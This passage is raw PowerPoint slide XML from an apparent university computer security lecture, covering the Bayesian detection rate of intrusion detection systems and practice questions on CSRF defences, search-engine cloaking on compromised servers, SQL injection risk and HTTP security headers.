        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31051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t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="457200"/>
            <a:ext cx="8001000" cy="6009193"/>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rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8153400" y="609600"/>
            <a:ext cx="282129" cy="492443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Ω</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3650859" y="2819400"/>
            <a:ext cx="3359541" cy="1409700"/>
            <a:chOff x="2209800" y="2819400"/>
            <a:chExt cx="3359541" cy="1409700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Oval 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2209800" y="2819400"/>
              <a:ext cx="2209800" cy="1409700"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>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r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>I</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Oval 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3269859" y="2819400"/>
              <a:ext cx="2299482" cy="1409700"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent3">
                <a:alpha val="63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nchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangular Callout 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="2835946"/>
            <a:ext cx="983859" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 131124"/>
              <a:gd name="adj2" fmla="val 50926"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rounded Rectangular Callout 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="1871839"/>
            <a:ext cx="983859" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -28079"/>
              <a:gd name="adj2" fmla="val 194444"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rounded Rectangular Callout 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5914281" y="4495800"/>
            <a:ext cx="983859" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -132780"/>
              <a:gd name="adj2" fmla="val -150463"/>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18</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1447800" y="5257800"/>
            <a:ext cx="6324600" cy="914400"/>
            <a:chOff x="1447800" y="5257800"/>
            <a:chExt cx="6324600" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rounded Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1447800" y="5257800"/>
              <a:ext cx="6324600" cy="91440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endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 1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5410200"/>
              <a:ext cx="5029200" cy="609600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Folded Corner 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4068427"/>
            <a:ext cx="3276600" cy="854746"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst/>
          </a:prstGeom>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tIns="182880" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>About 18% of all alerts are false positives!</a:t>
            </a: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58" y="840822"/>
            <a:ext cx="4991100" cy="1397000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8645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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We’re often given the detection rate and know the intrusion rate, and want to calculate the Bayesian detection rate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>99% accurate medical test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>99% accurate IDS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>99% accurate test for deception</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12237233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Bayesian Detection Rate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Fact: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>So to calculate the Bayesian detection rate:</a:t>
            </a:r>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One way is to compute:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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t>69</a:t>
            </a:fld>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782" y="1486605"/>
            <a:ext cx="6616700" cy="3683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650" y="3048000"/>
            <a:ext cx="3060700" cy="8382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500" y="5067300"/>
            <a:ext cx="6985000" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134301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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="control-flow-hij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5532"/>
            <a:ext cx="9144000" cy="4243294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="3581400"/>
            <a:ext cx="6705600" cy="2438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1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFE"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="2286000"/>
            <a:ext cx="5181599" cy="1600200"/>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31648810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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6155267" y="2592211"/>
            <a:ext cx="2057400" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -64043"/>
              <a:gd name="adj2" fmla="val 3893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Unknown</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangular Callout 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6121400" y="3441700"/>
            <a:ext cx="2057400" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -64729"/>
              <a:gd name="adj2" fmla="val -2456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rPr>
              <a:t>Unknown</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 1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 y="1600200"/>
            <a:ext cx="6451600" cy="2108200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8068036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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6155267" y="2592211"/>
            <a:ext cx="2057400" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -64043"/>
              <a:gd name="adj2" fmla="val 3893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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Zapf Dingbats"/>
                <a:ea typeface="Zapf Dingbats"/>
                <a:cs typeface="Zapf Dingbats"/>
                <a:sym typeface="Zapf Dingbats"/>
              </a:rPr>
              <a:t>✓</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6158089" y="3441700"/>
            <a:ext cx="2057400" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -64729"/>
              <a:gd name="adj2" fmla="val -24561"/>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nchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Zapf Dingbats"/>
                <a:ea typeface="Zapf Dingbats"/>
                <a:cs typeface="Zapf Dingbats"/>
                <a:sym typeface="Zapf Dingbats"/>
              </a:rPr>
              <a:t>✓</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>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965" y="4449012"/>
            <a:ext cx="5207000" cy="7366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965" y="5497452"/>
            <a:ext cx="5207000" cy="73660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 y="1600200"/>
            <a:ext cx="6451600" cy="2108200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34708057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t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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 y="1941773"/>
            <a:ext cx="8978900" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41607691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Practice Questions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22062287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1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Which of the following helps prevent CSRF attacks?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2133600"/>
            <a:ext cx="8229600" cy="3992563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Adding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a “secret token” to important forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sanitizing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>input received from POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validating that the “Origin” header has a URL from an appropriate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>domain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Checking that all users have a valid session token</a:t>
            </a:r>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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26285690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143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>In his guest lecture, Professor Christin described a technique for using compromised servers to sell unlicensed drugs online without being detected. These compromised servers typically behaved normally, except when visitors reached the site by looking for certain terms on a search engine. How could the site tell when it was visited from a search engine?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3200"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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19267649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0000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You are chatting with your web designer friend who sadly has not taken 18-487. He is building a site that aggregates lots of personal information (stored in a SQL database) and displays statistics about that data. Your friend claims that even if his site has SQL injection vulnerabilities, he does not need to be worried about SQL injection for the following reasons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data is only read from the database, so all database users have been set to only be able to use the “SELECT” query on the database (as opposed to “DELETE”, “INSERT”, or “UPDATE” queries). Attackers, therefore, cannot modify the database with SQL injection.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The results of any given query are never sent back directly to the user. Instead, they are aggregated and processed on the server to produce combined results that are later sent to the user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>might your friend still need to be concerned about SQL injection?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2493645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971800"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>In class, we discussed how new HTTP headers have been created to address web security concerns, including the “Origin” header for Cross-Site Request Forgery and the “X-Frame-Options” header to stop pages form being framed.  What is one advantage and one disadvantage of using HTTP headers to solve web security issues?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>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77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2178600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47839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="3768804"/>
            <a:ext cx="4455028" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questions?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30557948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END</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3970325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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
